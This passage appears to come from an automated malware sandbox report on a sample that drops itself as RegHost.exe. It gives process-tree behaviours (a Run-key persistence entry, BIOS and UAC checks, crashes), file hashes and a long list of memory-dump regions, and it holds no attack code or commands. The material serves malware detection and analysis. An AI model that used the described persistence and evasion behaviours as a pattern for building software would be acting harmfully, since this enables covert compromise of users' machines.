  cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Adds Run key to start application
  - Checks whether UAC is enabled

[depth 22] C:\Windows\system32\WerFault.exe
  cmdline: C:\Windows\system32\WerFault.exe -u -p 1424 -s 428
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\a.exe
  MD5:    488bf62441ff75040d50da4c2bec376b
  SHA1:   29931ab97f4cb72be955fd51994a895732da871e
  SHA256: afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
  SHA512: ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  MD5:    488bf62441ff75040d50da4c2bec376b
  SHA1:   29931ab97f4cb72be955fd51994a895732da871e
  SHA256: afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
  SHA512: ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

memory/64-163-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/64-162-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/64-161-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/644-185-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/644-186-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/644-187-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/832-179-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/832-178-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/832-177-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/980-199-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
memory/1288-181-0x0000000140000000-0x0000000140815000-memory.dmp  Filesize 8.1MB
memory/1300-143-0x0000000005290000-0x00000000052DB000-memory.dmp  Filesize 300KB
memory/1300-144-0x0000000006240000-0x00000000062D2000-memory.dmp  Filesize 584KB
memory/1300-145-0x00000000067E0000-0x0000000006CDE000-memory.dmp  Filesize 5.0MB
memory/1300-146-0x0000000006400000-0x000000000641E000-memory.dmp  Filesize 120KB
memory/1300-147-0x00000000066E0000-0x0000000006730000-memory.dmp  Filesize 320KB
memory/1300-148-0x0000000006FB0000-0x0000000007172000-memory.dmp  Filesize 1.8MB
memory/1300-149-0x0000000007DC0000-0x00000000082EC000-memory.dmp  Filesize 5.2MB
memory/1300-138-0x00000000057E0000-0x0000000005DE6000-memory.dmp  Filesize 6.0MB
memory/1300-142-0x00000000051D0000-0x00000000057D6000-memory.dmp  Filesize 6.0MB
memory/1300-137-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize 128KB
memory/1300-139-0x00000000051F0000-0x0000000005202000-memory.dmp  Filesize 72KB
memory/1300-140-0x0000000005320000-0x000000000542A000-memory.dmp  Filesize 1.0MB
memory/1300-141-0x0000000005250000-0x000000000528E000-memory.dmp  Filesize 248KB
memory/1424-225-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1424-226-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1424-227-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1560-183-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
memory/1648-170-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1648-169-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1648-171-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1872-153-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  Filesize 3.9MB
memory/1872-152-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  Filesize 3.9MB
memory/1872-154-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp  Filesize 3.9MB
memory/1884-211-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1884-210-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize 3.9MB
memory/1884-209-0x00007FF702120000-0x00007FF702508000-memory.dmp  Filesize
3.9MB
-
memory/1964-203-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1964-201-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1964-202-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2264-197-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2392-219-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2392-217-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2392-218-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-193-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-195-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-194-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2540-205-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2580-176-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2620-130-0x0000000008060000-0x00000000080AB000-memory.dmpFilesize
300KB
-
memory/2620-133-0x0000000004844000-0x0000000004846000-memory.dmpFilesize
8KB
-
memory/2620-126-0x0000000007B20000-0x0000000007B86000-memory.dmpFilesize
408KB
-
memory/2620-122-0x00000000073F0000-0x0000000007A18000-memory.dmpFilesize
6.2MB
-
memory/2620-127-0x00000000072F0000-0x0000000007356000-memory.dmpFilesize
408KB
-
memory/2620-128-0x0000000007D10000-0x0000000008060000-memory.dmpFilesize
3.3MB
-
memory/2620-129-0x0000000007BB0000-0x0000000007BCC000-memory.dmpFilesize
112KB
-
memory/2620-131-0x0000000008300000-0x0000000008376000-memory.dmpFilesize
472KB
-
memory/2620-125-0x00000000072B0000-0x00000000072D2000-memory.dmpFilesize
136KB
-
memory/2620-124-0x0000000004842000-0x0000000004843000-memory.dmpFilesize
4KB
-
memory/2620-132-0x0000000004843000-0x0000000004844000-memory.dmpFilesize
4KB
-
memory/2620-123-0x0000000004840000-0x0000000004841000-memory.dmpFilesize
4KB
-
memory/2620-121-0x00000000047B0000-0x00000000047E6000-memory.dmpFilesize
216KB
-
memory/2908-224-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2956-155-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2956-157-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3104-173-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3136-216-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3192-167-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3280-156-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3280-158-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3480-189-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3484-135-0x0000000005620000-0x0000000005662000-memory.dmpFilesize
264KB
-
memory/3484-118-0x00000000004B0000-0x00000000004C2000-memory.dmpFilesize
72KB
-
memory/3484-136-0x00000000059C0000-0x0000000005A0C000-memory.dmpFilesize
304KB
-
memory/3484-134-0x00000000028E0000-0x0000000002900000-memory.dmpFilesize
128KB
-
memory/3484-192-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3536-221-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3620-208-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3704-213-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3936-165-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB